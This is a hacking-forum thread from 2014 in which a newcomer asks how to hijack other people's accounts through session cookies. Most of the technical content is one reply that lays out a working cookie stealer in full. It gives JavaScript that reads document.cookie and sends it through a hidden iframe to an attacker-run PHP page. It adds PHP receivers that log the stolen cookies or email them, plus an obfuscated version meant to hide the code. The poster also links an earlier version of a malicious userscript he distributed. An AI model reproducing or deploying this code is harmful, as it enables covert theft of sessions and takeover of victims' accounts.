Finding cookies

General technological topics without their own forum go here

Finding cookies

Post by Zaytrox on Mon Jun 09, 2014 8:17 am
([msg=81299]see Finding cookies[/msg])

Is it possible to find out other peoples cookies remotely? Because surely then in theory you could change your Session ID to theirs, and effectively take control of their account?
I'm extremely new to this and just messing around, but was hoping one of you more experienced folk might know a fair bit more about it.

Thanks!

Zay.
Basic: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) (11)
Realistic: (1) (2) (3) (4) (5) (6) (7)
User avatar
Zaytrox
New User
New User
 
Posts: 16
Joined: Sun Jun 08, 2014 1:10 pm
Blog: View Blog (0)


Re: Finding cookies

Post by cyberdrain on Mon Jun 09, 2014 3:26 pm
([msg=81311]see Re: Finding cookies[/msg])

Yes it is possible, it is called session cookie hijacking...
Free your mind / Think clearly
I use the sarcasm color for both sarcasm and irony
User avatar
cyberdrain
Addict
Addict
 
Posts: 1526
Joined: Sun Nov 27, 2011 1:58 pm
Blog: View Blog (0)


Re: Finding cookies

Post by -Ninjex- on Mon Jun 09, 2014 4:56 pm
([msg=81319]see Re: Finding cookies[/msg])

You mean something like:
viewtopic.php?f=156&t=9882
.Down the Tunnel
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1472
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: Finding cookies

Post by Zaytrox on Tue Jun 10, 2014 1:45 am
([msg=81321]see Re: Finding cookies[/msg])

Aha, thank you - and I'll have a look at that now Ninjex, looks very interesting!

Also, surely you could brute force guess other cookies, which would mean you wouldn't be limited by things such as maximum number of attempts and needing the username, as with guessing passwords?
Although I guess you wouldn't be able to choose who to target, it'd just be the luck of the draw.
Basic: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) (11)
Realistic: (1) (2) (3) (4) (5) (6) (7)
User avatar
Zaytrox
New User
New User
 
Posts: 16
Joined: Sun Jun 08, 2014 1:10 pm
Blog: View Blog (0)


Re: Finding cookies

Post by -Ninjex- on Tue Jun 10, 2014 2:04 am
([msg=81322]see Re: Finding cookies[/msg])

Zaytrox wrote:Aha, thank you - and I'll have a look at that now Ninjex, looks very interesting!

Also, surely you could brute force guess other cookies, which would mean you wouldn't be limited by things such as maximum number of attempts and needing the username, as with guessing passwords?
Although I guess you wouldn't be able to choose who to target, it'd just be the luck of the draw.


Yes, but if you want to go that route, get a session id analyst tool. The burp suite has a good tool in it's arsenal for this called the sequencer. If the generated session id's seem completely random, and they are lengthy, then a brute force approach is hardly worth trying.
.Down the Tunnel
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1472
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: Finding cookies

Post by Zaytrox on Tue Jun 10, 2014 2:40 am
([msg=81323]see Re: Finding cookies[/msg])

-Ninjex- wrote:
Zaytrox wrote:...


Yes, but if you want to go that route, get a session id analyst tool. The burp suite has a good tool in it's arsenal for this called the sequencer. If the generated session id's seem completely random, and they are lengthy, then a brute force approach is hardly worth trying.


Aha, I'll have a look now!
Also, do you still have your script for the Greasemonkey Cookie Stealer? As I was wondering if it would be possible for me to have a look at how you did it.
Basic: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) (11)
Realistic: (1) (2) (3) (4) (5) (6) (7)
User avatar
Zaytrox
New User
New User
 
Posts: 16
Joined: Sun Jun 08, 2014 1:10 pm
Blog: View Blog (0)


Re: Finding cookies

Post by -Ninjex- on Tue Jun 10, 2014 7:01 am
([msg=81330]see Re: Finding cookies[/msg])

Unfortunately, my cookie stealing script was originally hosted at userscripts.org, and they have since gone down.

I can however explain the process I took in order to pull it off.

Things I needed :
1. A website with PHP hosting.
2. A way to get desired JavaScript code to run on the victim, hence grease monkey.
3. A way to help keep the malicious code hidden from the source code.
4. A way to help keep the malicious code hidden as it is running on the victims end.

So, this is what needs to happen
JavaScript needs to pull the users cookie information, which can be done with document.cookie
We will then have JavaScript append an iframe directed to our site, where we have a PHP script waiting to obtain the cookie information.
We will do this in the form of a $_GET parameter.
Then our site will redirect the iframe back to some other page, my choice was back to hackthissite

So our sites path will be set up something like so:
http://www.cookiemonster.com/cookie.php?cookie=<cookie information here>

Now, if we have a mail service set up, we can just send the cookie information via mail, so that it's not on a server publicly (without access restrictions). However, the other route would be to write it to a file on the server, so that you can view it later.
Here is a snippet of PHP code to do this.

Code: Select all
<?php
$cookie = $HTTP_GET_VARS["cookie"]; // Grab the information with PHP
$file = fopen('cookies.txt', 'a');
fwrite($file, $cookie . "\r\n");
echo("<script>location.href='http://www.redirecttosomesite.com';</script>");
?>


if you have it setup to email, use this method instead

Code: Select all
<?php
$hacker_email   = 'hacker@1337.com';
$sub = 'Cookie Notification';
$cookie = $HTTP_GET_VARS["cookie"];
mail($to, $sub, $cookie);
echo("<script>location.href='http://www.redirecttosomesite.com';</script>");
?>


The JavaScript code I used was similar to this I believe (not obfuscated)

Code: Select all
var frame = document.createElement('iframe');
frame.setAttribute('id', 'ifrm');
document.body.appendChild(frame);
frame.setAttribute('src', 'www.cookiemonster.com/cookie.php?cookie=' + document.cookie);
document.getElementById('ifrm').height= 0 + "px";
document.getElementById('ifrm').width= 0 + "px";


The next step is obfuscating the JavaScript code, which I did poorly and not sure why. Maybe because I was naive and well, pretty fucking stupid back then.

So it ended up a little more sloppy than this:

Code: Select all
$HY7W8yrC$O2JKqyG2x$=function(n){if(typeof($HY7W8yrC$O2JKqyG2x$.list[n])=="string")return $HY7W8yrC$O2JKqyG2x$.list[n].split("").reverse().join("");return $HY7W8yrC$O2JKqyG2x$.list[n]};$HY7W8yrC$O2JKqyG2x$.list=["=eikooc?php.eikooc/moc.retsnomeikooc.www"];var c=document.createElement('iframe');c.setAttribute('id','ifrm');document.body.appendChild(c);c.setAttribute('src',$HY7W8yrC$O2JKqyG2x$(0)+document.cookie);document.getElementById('iframe').height=0+"px";document.getElementById('iframe').width=0+"px";
.Down the Tunnel
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1472
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: Finding cookies

Post by Zaytrox on Tue Jun 10, 2014 7:07 am
([msg=81331]see Re: Finding cookies[/msg])

-Ninjex- wrote:...


Thank you very much, that's perfect! I'll spend sometime looking through that now, see if I can recreate something similar myself.

Again, thanks!
Basic: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) (11)
Realistic: (1) (2) (3) (4) (5) (6) (7)
User avatar
Zaytrox
New User
New User
 
Posts: 16
Joined: Sun Jun 08, 2014 1:10 pm
Blog: View Blog (0)


Re: Finding cookies

Post by mShred on Sat Jun 14, 2014 3:02 pm
([msg=81382]see Re: Finding cookies[/msg])

@Ninjex,
http://userscripts.org:8080/ is working as of right now. Not sure how far back that DB goes but yeah.

Update: Looky here.
Image

For those about to rock.
User avatar
mShred
Administrator
Administrator
 
Posts: 1769
Joined: Tue Jun 22, 2010 4:22 pm
Blog: View Blog (2)


Re: Finding cookies

Post by -Ninjex- on Sat Jun 14, 2014 7:26 pm
([msg=81406]see Re: Finding cookies[/msg])

mShred wrote:@Ninjex,
http://userscripts.org:8080/ is working as of right now. Not sure how far back that DB goes but yeah.

Update: Looky here.


Fuq yeah, you are awesome.
I removed some code in an "update" for security reasons of course, although I can't remove all of it.
So, here is a link to the previous version before changes:

http://userscripts.org:8080/scripts/diff/159331/626810
.Down the Tunnel
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1472
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Next

Return to General

Who is online

Users browsing this forum: No registered users and 0 guests